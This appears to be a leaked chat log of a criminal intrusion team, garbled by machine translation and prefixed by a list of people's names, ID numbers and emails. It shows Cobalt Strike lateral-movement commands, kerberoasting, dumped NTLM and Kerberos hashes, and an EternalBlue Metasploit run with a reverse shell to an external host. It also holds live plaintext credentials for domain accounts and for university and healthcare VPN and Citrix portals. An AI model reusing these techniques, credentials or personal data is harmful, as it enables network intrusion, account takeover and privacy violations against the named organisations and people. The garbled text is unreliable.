Bhola HP20196201010396384455535HP e51ae5f54a13577b4eedab3d4c2836b644757c7c99b9d865aa39918079d7844c harjeetroadlines95+24@gmail.com Yadav Santosh HP2019620101059773261151HP 64a4837d5761bb401f089c999cde3ec2316195f46e602d30c0089a2644d34c09 harjeetroadlines95+5@gmail.com Pandey Sanjay HP2019620106501991951580HP 18b0b6265c6965aea7d75fa147094d89cbedac2153540cbd1e7ffa829cf28000 harjeetroadlines95+14@gmail.com Ali Farman HP20196290106543854136534HP a38df217726c7869140d147ae1c06c3b3ae3dd9f513872614dcbdbb9fc80822e harjeetroadlines95+52@gmail.com Kumar yadav Manoj HP2019620106583623832858HP a10e69c47b04ee897a784f8c55cc222c26d034dbfc622826586e31f429848383 harjeetroadlines95+44@gmail.com Ahmed Mustaq HP2019620107126389961096HP 4d081a605ec6f5c420b4f0498efccd6af3880b3b4abbeb700eca35d5a14cffb6 
harjeetroadlines95+32@gmail.com singh Amritpal HP2019620107166277311185HP 06dee60f4c72a87a1a86e3ffca40c5906a83f9cf1394b27e6d7b13d3d034da4a harjeetroadlines95+36@gmail.com Sharma Surendra HP2019620107208559417976HP 42ca67a00c3692ccdf792e01e3bd25a5a66ddcce5ff6bc4314e804cc6e22d12c harjeetroadlines95+49@gmail.com Singh Paramjit HP2019620107248623258019HP 9b3957be4c45929c47d7cf447105a2488460da7044b147aa715f2c3dd55f32f4 harjeetroadlines95+43@gmail.com Khan Sohel HP201962010726835843708HP 03ac674216f3e15c761ee1a5e255f067953623c8b388b4459e13f978d7c846f4 harjeetroadlines95+38@gmail.com Yadav Chandrajeet HP2019620107291687742668HP 564b77746834fac1a3fbd08bb75c5ca418ae22c32ec6fd99697e2c9de5beee17 harjeetroadlines95+22@gmail.com Kuddus Abdul HP2019620107332167491575HP 8acc6699e1efd4e2d089011a45e55c7f17fd09c34e89a9a4c5259aa1ed218b31 harjeetroadlines95+23@gmail.com singh Raviraj HP2019620107374005617063HP ef9505d24415cc7f19baef0bbf47f39e9f5e69f26fb82ee2769af3ec020f2f36 harjeetroadlines95+51@gmail.com Saroj Lalji HP2019620107418163901165HP 43f079f13bbc55a963b810e7f6a101c6e234634dccd27898d4be234b94fc0351 harjeetroadlines95+40@gmail.com Yadav Bhuneshwar HP201962010745425411913HP b1448c1fe3d2d0252198101ac75580a38cd24296453736f2698800ce8291a9a7 harjeetroadlines95+9@gmail.com kumar Sushil HP2019620107459870763681HP a6b2ff167350bc4e65ce22f5d41a31cf5db73d5228d377b254a77f2df5967be7 harjeetroadlines95+20@gmail.com Singh Sukhdev HP2019620107508772408904HP 39f504edb611f64f85ac2fedda7965a966df33c21a0764b70d122b69bc10a1ef harjeetroadlines95+1@gmail.com Faisal Mohd HP2019629010755579004247HP e4b4c3e134a9e29c2ec3b483f4b5388a742165d49b9fa6896ca09ae5f4742665 harjeetroadlines95+7@gmail.com S Yadav Ramraj HP2019620107594925018904HP c16fe0b02048b17c3193c17e5c3418dbb1341b5d15b73a90c7111dc960b6dea3 harjeetroadlines95+33@gmail.com singh Navkarandeep HP201962010787333855982HP fe03e51728e1515d9bd9182cedcdd6cb897cd4829e48cf2cacf3d83cda4d2ab1 harjeetroadlines95+21@gmail.com Kumar Akhilesh 
HP201962010816555033866HP edb5656900c6b3e667de00038bda04127868ee861f2b5225afadb6960b69cc50 harjeetroadlines95+6@gmail.com Kumar Pradeep HP2019620108202746958327HP 26c2e1daf8a8174bc999e72b1b9c92c3477977884bad3f889735e4e45a324dda harjeetroadlines95+26@gmail.com Yadav Vinod HP2019620108263742055697HP 58895edc24dbf57a57518af35ebb42c33dffe8cc94bb8851c962a55e5a960aad harjeetroadlines95+46@gmail.com Yadav Rambrij HP2019620108304916009069HP caf7d1996d96a5ce4f25cf82250d2d2825785a295d0ca05106f055d20392c9e7 harjeetroadlines95+13@gmail.com Yadav Yogendra HP2019620108346644272108HP e844104206d88758840a8f77e6dcc0f9b917e1b3d3e11655297c6340ce2f3734 harjeetroadlines95+3@gmail.com Yadav Ramdaras HP201962010836190078047HP 025750f879fba28d4d251ce0f2d023a17f4114d2e9e4f1e64e401e71559b414d harjeetroadlines95+54@gmail.com singh Vinod HP2019620108387071096273HP 419e4e274b748c7a247c6e0edbccc7e2d04244c915f2f73fe8509b31cecb29e7 harjeetroadlines95+47@gmail.com Khan Salman HP20196290108428759387650HP 817953730feb1dddc4aeff1098b1ca4781ca8e654565656872be24f3f904589003 harjeetroadlines95+27@gmail.com kumar tiwari Abhimanyu HP2019620108472108246672HP 4cc427c04edca8e7ff1b9c8301842d5f0b1d1cd40e99d95cdf036beafac0e7e1 harjeetroadlines95+8@gmail.com mishra Kripashankar HP2019620108511300311348HP 187db3e24a345628fbd7f897a1e76a55ab5e22c01561d52b239f840e67bd59fb harjeetroadlines95+41@gmail.com Singh Mangal HP20196290108554546177564HP fd5ad27c0a5c5e8046ba867ac37b42c72ca9366783b6129940e8deca384fb945 9881318592@abcxyz.iin Kumar singh Suresh HP2019620108595175932621HP 2cb025bc62d110e7beec6c45fbfe795352c4194b751e1a6e18df3c47a0cd79f7 harjeetroadlines95+35@gmail.com Singh Gurbinder HP201962010877746921752HP 753d8a9ccd60617d73ff1c2b945ee1374e80fd3e9bbc8485c020a3ae46c792f8 harjeetroadlines95+10@gmail.com Pandey Kuldeep HP2019620109127897736262HP fdb9c838fd85f213933cb7342d6d21d7508dbf31b9ca8ad1c00b672c04fa87e8 harjeetroadlines95+39@gmail.com Asare Ram HP20196290109217794143490HP 
0f91dbf8da8988f7f79476e17eb87b294c086142f6a452fa2332285e3c40e402 harjeetroadlines95+31@gmail.com kumar saroj Harihar HP2019620109261508147074HP 15c4e7a3d2c1e7983a9ff4f59d6a701b965f1d0ad11038c7a4b8a44e9f48a34e harjeetroadlines95+34@gmail.com saroj Rammurat HP2019620109303478651104HP f44f1c235edd95e7f958fd3b6bcdb41a04daecfe3f99d9499187a9d9d5fe2876 harjeetroadlines95+2@gmail.com yadav Chotelal HP201962010938554818780HP c5e9cbd9bb4223ce7750d64000e82c0fc8664a666feba9fdbd994a9530c4d6c8 harjeetroadlines95+30@gmail.com Singh Ravendra HP2019620109397620666116HP 4c5041f14fbe628c79c03a4f302afcfee51d7ee7daec50747b9b619fb1211f27 harjeetroadlines95+17@gmail.com Sahani Jitendra HP201962010944646843344HP 5ba88e4137d7233d3c42e36b7f9dcca9138504343f89324641d286ba52ffbf80 harjeetroadlines95+4@gmail.com Yadav ShivPrasad HP2019620109488162287045HP 9dc9c5a3aafdd7856a724723a9a92672a5c86165f360c634658d76f428550b6e harjeetroadlines95+50@gmail.com Singh DALJEET HP20196290109529879135556HP 54d6154b9ef93bb6ac2e7db3359132dce130de7a081a19a4ea0dd5cff898ae harjeetroadlines95+18@gmail.com pratap yadav Mahendra HP20196290109573398884992HP c28de86389b6ebc8e646d13602d153b2ffdad50e69a69c69e6376e10c0c6dab7 harjeetroadlines95+37@gmail.com Kumar singh Raj HP201962010987142216555HP 769c174ad96ac9a01348043f932c22cbde1a65c934354b273db481b329864722 harjeetroadlines95+25@gmail.com Sankar Sankar `````` [-] Could not open service control manager on \192.168.1.169: 1722 ``What do you mean by 1722``? Am connecting services.msc to another computer from my machine and got ... AM (From:Configuration Manager Software Updates Management). 
`````` beacon> remote-exec psexec \\192.168.1.169 process list [*] Tasked beacon to run 'process list' on \192.168.1.169 via Service Control Manager [-] Could not open service control manager on \192.168.1.169: 1722 [+] host called home, sent: 1777 bytes `````` user 2-2[ABINASHP]abinash.pattnayak/5776|2020Oct07 19:52:33> remote-exec psexec \\192.168.9.42 ipconfig /flushdns [*] Tasked beacon to run 'ipconfig /flushdns' on \192.168.9.42 via Service Control Manager [-] Could not open service control manager on \192.168.9.42: 5 [+] host called home, sent: 2011 bytes [-] Could not open service control manager on \192.168.9.42: 5 ``psexec_command then beacon> run wmic /node:192.168.1.169 process list brief [*] Tasked beacon to run: wmic /node:192.168.1.169 process list brief [+] host called home, sent: 61 bytes [+] received output: Node - 192.168.1.169 ERROR: Description = The RPC server is unavailable. ``Or architecture, ask for a list of processes...''? beacon> run dir \\192.168.9.169\ADMIN$ [*] Tasked beacon to run: dir \\192.168.9.169\ADMIN$ [+] host called home, sent: 44 bytes [-] could not spawn dir \\192.168.9.169\ADMIN$: 2 ``Try the other two at once ``ADMIN$`` is it the same? ``Could not spawn``? beacon> run dir \192.168.9.42.42\C$ [*] Tasked beacon to run: dir \192.168.9.42C$ [+] host called home, sent: 39 bytes [-] could not spawn dir \192.168.9.42C$: 2] How about just ``dir \\192.168.9.42.42\C$``? beacon> run whoami [*] Tasked beacon to run: whoami [+] host called home, sent: 24 bytes [+] received output: ad\abinash.pattnayak ```shell whoami?`` beacon> run net use * \\192.168.9.42.42\C$ /persistent:no [*] Tasked beacon to run: net use * \\192.168.9.42\C$ /persistent:no [+] host called home, sent: 60 bytes [+] received output: The password is invalid for \\192.168.9.42C$. 
``` ``` beacon> run net use * \\192.168.9.169\C$ /persistent:no [*] Tasked beacon to run: net use * \\192.168.9.169\C$ /persistent:no [+] host called home, sent: 61 bytes [+] received output: The password is invalid for \\192.168.9.169\C$. Enter the user name for '192.168.9.169': ``[ ](https://mediaeveryone.com/group/happay-in?msg=pkt4xfiMymwKJftue) why don't you send a keb just in caseI can't connect to these machines user 2-2[ABINASHP]SYSTEM */23308|2020Oct07 19:13:04> shell net group "Domain Admins" /dom [*] Tasked beacon to run: net group "Domain Admins" /dom [+] host called home, sent: 61 bytes [+] received output: The request will be processed at a domain controller for domain ad.happay.in. Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- abhinav.bhaskar Administrator anshul chandan koushik.s mohit.goel nitin.choudhary pritam sudhir varun vivek.kumar The command completed successfully. ``Mmmmmm''. 
beacon> net share \\192.168.9.169 [*] Tasked beacon to run net share on 192.168.9.169 [+] host called home, sent: 104505 bytes [+] received output: Shares at \192.168.9.169: Share name Comment ---------- ------- [+] received output: ADMIN$ Remote Admin C$ Default share HP OfficeJet Pro 8710 PCL-3 HP OfficeJet Pro 8710 PCL-3 IPC$ Remote IPC print$ Printer Drivers ``` ``` beacon> net share \\192.168.9.42 [*] Tasked beacon to run net share on 192.168.9.42 [+] host called home, sent: 104505 bytes [+] received output: Shares at \192.168.9.42: Share name Comment ---------- ------- [+] received output: ADMIN$ Remote Admin C$ Default share IPC$ Remote IPC ``` ``` beacon> net share \\192.168.1.185 [*] Tasked beacon to run net share on 192.168.1.185 [+] host called home, sent: 104505 bytes [+] received output: Shares at \192.168.1.185: Share name Comment ---------- ------- [+] received output: ADMIN$ Remote Admin C$ Default share IPC$ Remote IPC `````` user 2-2[ABINASHP]SYSTEM */23308|2020Oct07 19:09:59> execute-assembly Rubeus.exe kerberoast /format:hashcat /outfile:C:\ProgramData\Rubeus_hashes_full.txt [*] Tasked beacon to run .NET program: Rubeus.exe kerberoast /format:hashcat /outfile:C:\ProgramData\Rubeus_hashes_full.txt [+] host called home, sent: 320189 bytes [+] received output: ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v1.5.0 [*] Action: Kerberoasting [*] NOTICE: AES hashes will be returned for AES-enabled accounts. [*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts. [*] Searching the current domain for Kerberoastable users [+] host called home, sent: 64 bytes [+] received output: [*] Total kerberoastable users : 1 [*] SamAccountName : sudhir [*] DistinguishedName : CN=Sudhir Kumar. 
Thapa,OU=IT-Team,OU=Users,OU=HAPPAY,DC=ad,DC=happay,DC=in [*] ServicePrincipalName : AgpmServer/HAPPAYADSERVER.ad.happay.in/ad.happay.in [*] PwdLastSet : 25-09-2020 12:45:35 [*] Supported ETypes : RC4_HMAC_DEFAULT [*] Hash written to C:\ProgramData\Rubeus_hashes_full.txt [*] Roasted hashes written to : C:\ProgramData\Rubeus_hashes_full.txt ``Manually check a lot of pc's then runNo luck with anything else? @tl1 can you run shuffleboarder? User Password Email Id Happay@81 isha_wattle@geojit.com Happay@82 jasdeep_k@geojit.com Happay@83 karmjeet_kaur@geojit.com Happay@84 rohit_kumar@geojit.com Happay@85 sumit_sharma@geojit.com Happay@86 sunil_chhabra@geojit.com Happay@87 joga_singh@geojit.com Happay@88 kimat_r@geojit.com Happay@89 om_parkash@geojit.com Happay@90 puneet_p@geojit.com Happay@91 shashank_jain@geojit.com Happay@92 vishesh_k@geojit.com `````` Happy@26265 Gopal@26265 Abinash@26265 ````ad.happay.in [192.168.1.12]```` HAPPAYADSERVER 192.168.1.2 HAPPAYADCSERVER 192.168.1.12 ``please thank youuser7192.168.43.108user4''. [+] 192.168.1.2:445 - 192.168.1.2:445 - Success: '.\abinash.pattnayak:aad3b435b51404eeaad3b435b51404ee:b4e99243a0b9c8fa481d2307a26cc933' ``Yeah, but it's not an admin account. [+] 192.168.9.212:445 - 192.168.9.212:445 - Success: '.\Admin:aad3b435b51404eeaad3b435b51404ee:39a6957f6260484bd84efa7933501865' [+] 192.168.9.169:445 - 192.168.9.169:445 - Success: '.\Admin:aad3b435b51404eeaad3b435b51404ee:39a6957f6260484bd84efa7933501865' [+] 192.168.9.42:445 - 192.168.9.42:445 - Success: '.\Admin:aad3b435b51404eeaad3b435b51404ee:39a6957f6260484bd84efa7933501865' [+] 192.168.1.185:445 - 192.168.1.185:445 - Success: '.\Admin:aad3b435b51404eeaad3b435b51404ee:39a6957f6260484bd84efa7933501865' ``1) test normally, I told you to update the AD 2) the VPN was turned off C:\Users\user>ping -n 1 BI-SANDBOX.evo.local Ping request could not find host BI-SANDBOX.evo.local. Please check the name and try again. 
C:\Users\user>ping -n 1 CHEECH.evo.local Pinging CHEECH.evo.local [172.17.70.16] with 32 bytes of data: Reply from 172.17.70.16: bytes=32 time=66ms TTL=126 Ping statistics for 172.17.70.16: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 66ms, Maximum = 66ms, Average = 66ms. ``I will check nowPing request could not find host HQ-DC-2.evo.local. Please check the name and try again. Is it available? It's weird...Windows Server 2008 users? The machines I browse on might have fallen off the vpn Ping request could not find host BI-SANDBOX.evo.local. Please check the name and try again.Yes, no, there are the crescendos, are they needed? Under the user without rights + is it? ps command I wait for the load itself I wonder how so? I have realtime prot turned on itself)) is available.com and the load immediately if okeya pinga only daidar command will do? and the load is on the dedication? hang on and under the session goes to azure I think he dumps ffv azure another type of goVo\bplehal ``` https://apps.sematext.com/ui/monitoring/19585/solrCloudOverviewReportPage https://portal.azure.com/#@evo.com/resource/subscriptions/eaa8f156-823c-4beb-91bb-bd6703f0c0e6/resourceGroups/www-production/providers/microsoft.insights/components/evodotcom/overview You can try it under the creeds. http://evosolr.southcentralus.cloudapp.azure.com/solr/#/~cloud `````` $krb5tgs$23$*Administrator$nordicaero.com$MSSQLSvc/naarns01.nordicaero.com``Okv toad come offa in the input same cob was another session from this domain, someone worked it, no zakrepa ?this polozak only in this domaina in the trusts empty ? mb this is the case... mm-hmm((`` 'nbtstat' is not recognized as an internal or external command, operable program or batch file. ``nbtstat won't help, I could be wrong which shz I took from the portscan. And so, took the host us did a ping and by 24th to 445 and them in the scan. 
It turns out that in theory it could be from another domain.Then the hostname you already know if it's taken from the ad_comp current ee stop do not understand does not return hostOne from the current domain taken from the ad_com.Only within one domainacrossdomain authorization so will not work about the host which we attack1 min + it is sure from this domain? msf6 exploit(windows/smb/ms17_010_psexec) > options Module options (exploit/windows/smb/ms17_010_psexec): Name Current Setting Required Description ---- --------------- -------- ----------- DBGTRACE false yes Show extra debug trace info LEAKATTEMPTS 99 yes How many times to try to leak transaction NAMEDPIPE no A named pipe that can be connected to (leave blank for auto) NAMED_PIPES /opt/metasploit-framework/embedded/framework/data/wordlists/named_pipes.txt yes List of named pipes to check RHOSTS 10.7.0.73 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' RPORT 445 yes The Target port (TCP) SERVICE_DESCRIPTION no service description to be used on target for pretty listing SERVICE_DISPLAY_NAME no The service display name SERVICE_NAME no The service name SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) 
or a normal read/write folder share SMBDomain CORP.TELEVISA.COM.MX no The Windows domain to use for authentication SMBPass R8WTksIOle1rP8)P no The password for the specified username SMBUser Hgutierreze no The username to authenticate as Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 23.106.160.50 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf6 exploit(windows/smb/ms17_010_psexec) > run [*] Started reverse TCP handler on 23.106.160.50:4444 [*] 10.7.0.73:445 - Authenticating to 10.7.0.73 as user 'Hgutierreze'... [-] 10.7.0.73:445 - Rex::Proto::SMB::Exceptions::LoginError: Login Failed: The server responded with error: STATUS_TRUSTED_RELATIONSHIP_FAILURE (Command=115 WordCount=0) [*] Exploit completed, but no session was created. msf6 exploit(windows/smb/ms17_010_psexec) > ``A couple of minutemen valid domains likeKlarens? [-] 10.7.0.73:445 - Unable to find accessible named pipe! ``Domain creeds any added creeds in the options? msf6 exploit(windows/smb/ms17_010_psexec) > run [*] Started reverse TCP handler on 23.106.160.50:4444 [*] 10.7.0.73:445 - Target OS: Windows Server 2008 R2 Enterprise 7600 [-] 10.7.0.73:445 - Unable to find accessible named pipe! [*] Exploit completed, but no session was created. You know how to do it... I think you've already done it... can you do it? And you can score through the pajpkaroch see can you run stageless pailoat not work how? no session? or error? all checked not work) yes Probably not. It could be admin/smb/ms17_010_command but it doesn't work and I think it could be exploit/windows/smb/ms17_010_psexecheck the options through external blu? look... there seems to be a module that can run an echo via this splot? 
[*] 10.7.0.73:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 10.7.0.73:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7600 x64 (64-bit) [*] 10.7.0.73:445 - Scanned 1 of 1 hosts (100% complete) [*] 10.7.0.73:445 - Connecting to target for exploitation. [+] 10.7.0.73:445 - Connection established for exploitation. [+] 10.7.0.73:445 - Target OS selected valid for OS indicated by SMB reply. [*] 10.7.0.73:445 - CORE raw buffer dump (38 bytes) [*] 10.7.0.73:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2 [*] 10.7.0.73:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 70 69 73 008 R2 Enterpris [*] 10.7.0.73:445 - 0x00000020 65 20 37 36 30 e 7600 [+] 10.7.0.73:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 10.7.0.73:445 - Trying exploit with 12 Groom Allocations. [*] 10.7.0.73:445 - Sending all but last fragment of exploit packet [*] 10.7.0.73:445 - Starting non-paged pool grooming [+] 10.7.0.73:445 - Sending SMBv2 buffers [+] 10.7.0.73:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 10.7.0.73:445 - Sending final SMBv2 buffers. [*] 10.7.0.73:445 - Sending last fragment of exploit packet! [*] 10.7.0.73:445 - Receiving response from exploit packet [+] 10.7.0.73:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 10.7.0.73:445 - Sending egg to corrupted connection. [*] 10.7.0.73:445 - Triggering free of corrupted buffer. [*] Started bind TCP handler against 10.7.0.73:4444 [-] 10.7.0.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 10.7.0.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 10.7.0.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [*] 10.7.0.73:445 - Connecting to target for exploitation. [+] 10.7.0.73:445 - Connection established for exploitation. [+] 10.7.0.73:445 - Target OS selected valid for OS indicated by SMB reply. 
[*] 10.7.0.73:445 - CORE raw buffer dump (38 bytes) [*] 10.7.0.73:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2 [*] 10.7.0.73:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 70 69 73 008 R2 Enterpris [*] 10.7.0.73:445 - 0x00000020 65 20 37 36 30 e 7600 [+] 10.7.0.73:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 10.7.0.73:445 - Trying exploit with 17 Groom Allocations. [*] 10.7.0.73:445 - Sending all but last fragment of exploit packet [*] 10.7.0.73:445 - Starting non-paged pool grooming [+] 10.7.0.73:445 - Sending SMBv2 buffers [+] 10.7.0.73:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 10.7.0.73:445 - Sending final SMBv2 buffers. [*] 10.7.0.73:445 - Sending last fragment of exploit packet! [*] 10.7.0.73:445 - Receiving response from exploit packet [+] 10.7.0.73:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 10.7.0.73:445 - Sending egg to corrupted connection. [*] 10.7.0.73:445 - Triggering free of corrupted buffer. [-] 10.7.0.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 10.7.0.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 10.7.0.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [*] 10.7.0.73:445 - Connecting to target for exploitation. [+] 10.7.0.73:445 - Connection established for exploitation. [+] 10.7.0.73:445 - Target OS selected valid for OS indicated by SMB reply. [*] 10.7.0.73:445 - CORE raw buffer dump (38 bytes) [*] 10.7.0.73:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2 [*] 10.7.0.73:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 70 69 73 008 R2 Enterpris [*] 10.7.0.73:445 - 0x00000020 65 20 37 36 30 e 7600 [+] 10.7.0.73:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 10.7.0.73:445 - Trying exploit with 22 Groom Allocations. 
[*] 10.7.0.73:445 - Sending all but last fragment of exploit packet [*] 10.7.0.73:445 - Starting non-paged pool grooming [+] 10.7.0.73:445 - Sending SMBv2 buffers [+] 10.7.0.73:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 10.7.0.73:445 - Sending final SMBv2 buffers. [*] 10.7.0.73:445 - Sending last fragment of exploit packet! [*] 10.7.0.73:445 - Receiving response from exploit packet [+] 10.7.0.73:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 10.7.0.73:445 - Sending egg to corrupted connection. [*] 10.7.0.73:445 - Triggering free of corrupted buffer. [-] 10.7.0.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 10.7.0.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 10.7.0.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [*] Exploit completed, but no session was created. ``and what axis? and the first question?[ ](https://mediaeveryone.com/group/corp-televisa-com-mx?msg=Y64nWyXyE2kdkcJyf) hztachka sees the internet? scanner says vulnerable? found 1710 but can not exploit.nothing yet, try other methods, on these 2 pulls nothing to do at all so here we have what? hmOn the first two times did not shoot, but then took it off. HZ maybe I saved crookedly, but I know for sure that I re-shot because the file was ripped off what the fuck is it calledget-computers take it off via pc commandlet if ad_find.exeCMDNot via cmd take it off via pc about what?) No, via cmd via pc? What the fuck is that? See, I re-shot it twice. you know that it is not complete? on ad_computers``. 
ASPDC4$ ASPDC5$ ASPDPM2$ CFSQL2$ CFSQLTEST1$ CFWEB1$ CFWEBTEST1$ WIN7_VM$ sccmservice1$ ASPDPM3$ ASPVCS1$ WIN7VDI-PC$ BOBM$ BBCTX3$ BBCTX2$ BBCTX4$ BBCTX1$ BBGW3$ ASPUTIL2$ ASPXA3$ BBGW1$ FCCTX3$ CFCTX2$ WMLXA1$ ASPXA1$ XENAPP76$ ASPXA7$ XENAPP71-2$ ASPXA9$ CFHV1$ BBCTX6$ ASPXA5$ ASPFS1$ BBCTX5$ BBCTX7$ ASPSQL2$ ASPXA6$ BBCTX8$ ASPXA4$ CFXA1$ ASPXA2$ ASPXA10$ ASPXA8$ XENAPP71$ RCMTESTTS$ ASPSAN2012$ RCM2012$ ASPUTIL3$ NTIXA1$ NTIGSS1$ NTISAGE1$ NTISAGE2$ ASPXA11$ PHXADC1$ PHXA-1$ ASPXA65TEMPLATE$ XENAPP76PILOT$ USCXA1$ USCFS1$ ASPSYM1$ KOMIGTEST2008R2$ DRUTIL01$ ASPDC3$ MVEXA1$ DMGXA1$ MVEFS1$ NTIW71$ EGMANAGER$ EGCOLLECTOR$ ``How many npc have there been? What makes you think it's taking so long?`` It's all hovering.`` In sitrix for aspsql2svc There are no resources currently available for this user.`` The admin locked up Your credentials are invalid. Try again or contact your system administrator. ``I didn`t notice it before so always use it? The script does not pass the host list is autobroot, not smbshare host list? https://github.com/leaderimStalin/psbrau/blob/main/Invoke-SMBAutoBrute.ps1что for autobroot? autobroot does not work in tpsql2svc where admin will be fine see cmbshars under 2 polzakamyparu minu of this``. C:\Windows\system32 BBCTX5 @ MAPCIASP\aspsql2svc ``No username under which it's under ][ ](https://mediaeveryone.com/group/mapciasp-com?msg=bctF5N752KHAooiC4) ?net tse it's no username I know) so it's on the current host)`` C:\Windows\system32 BBCTX5 @ MAPCIASP\aspsql2svc ``The session in tpsh is under them. But I can run cmd and ps under these cres ``tacnfr you say access denied? where to run and how? But under these creeds can run cmd and psAccess deniedLjcneg pfrhsn what error? Various, wmic, ViewSQLk how do you try that does not connect? With these creds do not connect to the server ASPSQL2.mapciasp.com. Under these creeds and do not start the load. These creeds = user:aspsql2svc pwd:map#2013 I don't understand something. 
No connection to ASPSQL2.mapciasp.com with the credentials, no view of the directory via wmic Can't connect with cradles at ASPSQL2.mapciasp.com, can't see directory through wmic. Managed to run under creeds poewershell. From aspsql2svc tried to run the load, nothing.yes?This pwd: map#2013:thumbsup:will we parse the new tool and method[ ](https://mediaeveryone.com/channel/general?msg=32qzfSYtweTWNgzoD) ?everyone will have to read and get into at least there will be a process updated will we?you can finish with the current tasks and move smoothly to #sisd-petneav ptsh no possibility to run sharp files from memory ? i build you under x64 dll + all build with x64 check ? give the file silkoddelki palsanyeada no new cobalt ?was the cleanest of the lastllvm can buildCryptor clean have? in half an hour there will be a meeting and we'll discuss everything will close in an hour[ ](https://mediaeveryone.com/channel/general?msg=DQgoiuMG8xsQZaxZo) something silent dep(ok, now I'll try it in 3-4 koba depa will probably take a load of clean for each personal koba bildche with bildche? https://studentappst.asu.edu/vpn/index.html egomez34 Pupilo10169!!! ``` @user7``` https://cloudgw.cpcc.edu/vpn/index.html sperez14 Lisbeth1219 ``` @user3 check, you had it in the works``` https://vlab.unf.edu/vpn/index.html n00647072 fLORIDAHISTORY2074! ``` Is @user8 still available to replace ?@tl1 is there anything else? Your credentials are invalid. Try again or contact your system administrator. https://citrix.signature-healthcare.org/citrix/xenapp/auth/login.aspx md.raws 1984Bears ``` @user3 replacement, so it's clean ```. Cannot find path 'C:\Users\Healdton.IT\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine' because it does not exist. ``Yes, fine-tuning the computer, if you get an error after running the above command, you can check the default path manually ``` dir $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine So you're out of a job? 
And once again, I gave you a report on each of the two you gave me. One in the confab and the other in general. In one of the data is jammed, the second can not run cmd ``. Get-PSReadLineOption ``` last time, write down the accesses are dead and the network is dead? https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx ``` I have this network open on you, did you write to #general or to the confab? okReinstalling the OS on your computer. You blacked out and didn't see the partitions in #general? So what have you been doing? I've been texting you on every single one. https://paloca.cernerworks.com/citrix/prodweb/ `````` https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx `````` https://paloca.cernerworks.com/citrix/prodweb/ ``Yesterday with everyone on the networks, what's in work[ ](https://mediaeveryone.com/channel/general?msg=KkJ6tAjTNcYQip8Q5) What? [ ](https://mediaeveryone.com/channel/general?msg=7q8mQHmN7r28bkXnh) What do you mean yesterday missed? All died? What are you doing? I have 2 networks on you, I created you yesterday missed? Are you kidding, man? I wrote to you yesterday that the data is blockedpotomo created a hell of a conf[ ](https://mediaeveryone.com/channel/general?msg=ovxt4rPWrkyc7Tmzt) work you wrote back ok, you have progress on the grid or what? in trete look all there is a session domain `stg-healthcare.com` From where? @tl1 On what? @user3 not yet answered my question to me understand[ ](https://mediaeveryone.com/channel/general?msg=g8Qfkuof4BoNauGRY) ask about the loadNow if I think about it logically from your suggestion about the load how can I know about it? 
